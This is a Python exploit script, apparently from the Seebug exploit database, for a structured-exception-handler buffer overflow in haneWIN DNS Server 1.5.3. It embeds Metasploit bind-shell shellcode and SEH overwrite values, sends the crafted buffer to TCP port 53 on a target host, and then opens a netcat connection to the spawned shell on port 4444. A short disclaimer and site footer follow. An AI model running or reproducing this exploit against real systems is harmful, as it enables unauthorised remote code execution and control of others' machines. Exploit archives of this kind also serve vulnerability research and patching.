#!/usr/bin/python # Exploit Title: haneWIN DNS Server (SEH) # Author: Dario Estrada (dash) https://intrusionlabs.org # Date: 2014-01-29 # Version: haneWIN DNS Server 1.5.3 # Vendor Homepage: http://www.hanewin.net/ # Vulnerable app link:http://www.hanewin.net/dns-e.htm # Tested on: Windows XP SP3 # Thanks to God, to my family and all my friends for always being there # # Description: # A SEH overflow occurs when large amount of data is sent to the server # import socket, sys, os, time usage = "\n Usage: " + sys.argv[0] + " <host> \n" if len(sys.argv) < 2: print usage sys.exit(0) host = sys.argv[1] shellcode = ( #msfpayload windows/shell_bind_tcp R | msfencode -t c -b '\x00\xff\x0a\x0d' "\xb8\xdf\x64\x04\x29\xd9\xc7\xd9\x74\x24\xf4\x5d\x29\xc9\xb1" "\x56\x31\x45\x13\x83\xed\xfc\x03\x45\xd0\x86\xf1\xd5\x06\xcf" "\xfa\x25\xd6\xb0\x73\xc0\xe7\xe2\xe0\x80\x55\x33\x62\xc4\x55" "\xb8\x26\xfd\xee\xcc\xee\xf2\x47\x7a\xc9\x3d\x58\x4a\xd5\x92" "\x9a\xcc\xa9\xe8\xce\x2e\x93\x22\x03\x2e\xd4\x5f\xeb\x62\x8d" "\x14\x59\x93\xba\x69\x61\x92\x6c\xe6\xd9\xec\x09\x39\xad\x46" "\x13\x6a\x1d\xdc\x5b\x92\x16\xba\x7b\xa3\xfb\xd8\x40\xea\x70" "\x2a\x32\xed\x50\x62\xbb\xdf\x9c\x29\x82\xef\x11\x33\xc2\xc8" "\xc9\x46\x38\x2b\x74\x51\xfb\x51\xa2\xd4\x1e\xf1\x21\x4e\xfb" "\x03\xe6\x09\x88\x08\x43\x5d\xd6\x0c\x52\xb2\x6c\x28\xdf\x35" "\xa3\xb8\x9b\x11\x67\xe0\x78\x3b\x3e\x4c\x2f\x44\x20\x28\x90" "\xe0\x2a\xdb\xc5\x93\x70\xb4\x2a\xae\x8a\x44\x24\xb9\xf9\x76" "\xeb\x11\x96\x3a\x64\xbc\x61\x3c\x5f\x78\xfd\xc3\x5f\x79\xd7" "\x07\x0b\x29\x4f\xa1\x33\xa2\x8f\x4e\xe6\x65\xc0\xe0\x58\xc6" "\xb0\x40\x08\xae\xda\x4e\x77\xce\xe4\x84\x0e\xc8\x2a\xfc\x43" "\xbf\x4e\x02\x72\x63\xc6\xe4\x1e\x8b\x8e\xbf\xb6\x69\xf5\x77" "\x21\x91\xdf\x2b\xfa\x05\x57\x22\x3c\x29\x68\x60\x6f\x86\xc0" "\xe3\xfb\xc4\xd4\x12\xfc\xc0\x7c\x5c\xc5\x83\xf7\x30\x84\x32" "\x07\x19\x7e\xd6\x9a\xc6\x7e\x91\x86\x50\x29\xf6\x79\xa9\xbf" "\xea\x20\x03\xdd\xf6\xb5\x6c\x65\x2d\x06\x72\x64\xa0\x32\x50" "\x76\x7c\xba\xdc\x22\xd0\xed\x8a\x9c\x96\x47\x7d\x76\x41\x3b" "\xd7\x1e\x14\x77\xe8\x58\x19\x52\x9e\x84\xa8\x0b\xe7\xbb\x05" "\xdc\xef\xc4\x7b\x7c\x0f\x1f\x38\x8c\x5a\x3d\x69\x05\x03\xd4" "\x2b\x48\xb4\x03\x6f\x75\x37\xa1\x10\x82\x27\xc0\x15\xce\xef" "\x39\x64\x5f\x9a\x3d\xdb\x60\x8f" ) nSEH = '\xeb\x06\x90\x90' SEH = '\xd1\x07\xfc\x7f' opcode = "\xe9\xdf\xf6\xff\xff" junk = 'A' * (2324 - len(shellcode)) padding = 'A' * 600 buff = shellcode + junk + nSEH + SEH + opcode + padding print "[+] Connecting to %s:53" % (host) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, 53)) aix= shellcode + 'A' * (2324 - len(shellcode)) print "[*] Sending payload.." + " shellcode: " + str(len(shellcode)) s.send(buff) print "[*] Exploit Sent Successfully!" s.close() print "[+] Waiting for 5 sec before spawning shell to " + host + ":4444\r" time.sleep(5) os.system ("nc -n " + host + " 4444") except: print "[!] Could not connect to " + host + ":53\r" sys.exit(0)
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论